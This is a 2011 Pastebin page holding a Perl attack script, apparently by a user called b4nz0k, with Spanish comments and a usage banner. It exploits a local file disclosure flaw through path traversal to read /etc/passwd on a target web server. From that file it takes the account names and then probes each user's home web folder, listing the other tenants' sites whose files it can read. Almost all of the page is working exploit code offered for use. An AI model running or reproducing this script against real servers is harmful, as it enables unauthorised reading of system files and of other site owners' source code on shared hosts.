Advertisement
b4nz0k

Bypass Permisos Host

Dec 13th, 2011
125
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.34 KB | None | 0 0
  1. use HTTP::Request;
  2. use LWP::UserAgent;
  3.  
  4. my $browser = LWP::UserAgent->new();
  5.          
  6. sub banner {
  7.     print "
  8.    
  9.             _                 _        _      
  10.         |_  \/|_)|_| _  _  o __ (_|   |_|/ \ _ _|_
  11.         |_) / |    |_> _>  | | |__|   | |\_/_>  |_
  12.    
  13.             C o d e d  by  b 4 n z 0 k
  14.    
  15.     * Modo de Uso :
  16.     * perl script.pl [Web] [Carpeta_web] [path_destino(Opcional)]\n
  17.     *\tperl script.pl www.web.com/archivo.php?disclosure= htdocs
  18.     ";
  19.    
  20.     }
  21.  
  22.     $url = $ARGV[0]; # print  "$vuln\n";
  23.    
  24.         unless ($url) { &banner; }
  25.  
  26.     $home = $ARGV[1]; # print  "$home\n";
  27.     $dr = "home/"; #Esta Parte La deves de cambiar Manualmente dependiendo la informacion de "/etc/passwd"
  28.     $pt = "../../../../";
  29.     #$pt = "....//....//....//....//....//....//....//....//....//";
  30.     $bp = "";
  31.     @usuarios;
  32.     @vulnerados;
  33.     $archivo = $ARGV[2];
  34.    
  35.     unless ($ARGV[2]) {
  36.        
  37.             $archivo1 = "/index.php";
  38.             $archivo2 = "/index.html";
  39.         }
  40.  
  41.        
  42.         $url  = "http://" . $url if $url !~ m/^http\:\/\//;
  43.         if ($url =~ m/^http\:\/\/([a-zA-Z0-9-.]+)\/(.*)/)
  44.         {   $host = $1; $path0 = $2; }
  45.  
  46.     $path = $url . $path.  $pt . $pt . $pt . "etc/passwd" . $bp;
  47.      print "$path\n";
  48.     my $request = $browser->get($path);
  49.     my $content = $request->content;
  50.          
  51. #print "$content\n";
  52. if ($content =~ m/(.*):x:(.*):(.*):(.*):\/bin/g) {
  53. while ($content =~ m/(.*):x:(.*):(.*):(.*):\/bin/g )
  54. { #print $1 . "\n";
  55.     push (@usuarios,$1);    # Esto tambien puede cambiar el $1
  56. } } else { print "\n[*] Error En la Injeccion.\n\n"; exit; }
  57. &banner;
  58. print "\n\n[*] # Ju4ck34ndo [ Server * $host ] d3sd3 d3ntr0 #\t[*]\n\n";
  59.    
  60. foreach $n (@usuarios) {
  61.  
  62.     $path2 = $url .  $pt . $pt . $pt . $bp . $pt . $pt . $pt . $dr . $n . "/" . $home;
  63. #   print "$path2\n";
  64. unless ($ARGV[2]) {
  65.  
  66.         $path_g=$path2 . "/index.php";
  67.         &requestt($path_g);
  68.        
  69.         $path_g=$path2 . "/index.html";
  70.         &requestt;
  71.        
  72.         }
  73.     if ($ARGV[2]) {
  74.     $path_g = $path2 . $archivo;
  75.     &requestt($path_g); }
  76. }
  77. sub requestt {
  78.    
  79.         my $request2 = $browser->get($path_g);
  80.         my $content2 = $request2->content;
  81.        
  82.     #       print "$content2\n"; m/failed to open stream/
  83.             if ($content2 =~ m/\$(.*)/)
  84.                 {
  85.                     print "[#- pl0p -#]\t\ลง# - [ $n ] - #\n";
  86.                     push (@vulnerados,$path_g);
  87.                 }
  88.             #   else { print "# 3Rr0r # [$n]\t$path_g\n"; }
  89.     }
  90. print "\n\n\t[ # - Webs Con Bypass de Permisos - # ]\n\n";
  91. foreach $n (@vulnerados)
  92. {
  93.     print "[*] $n\n\n";
  94.     }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement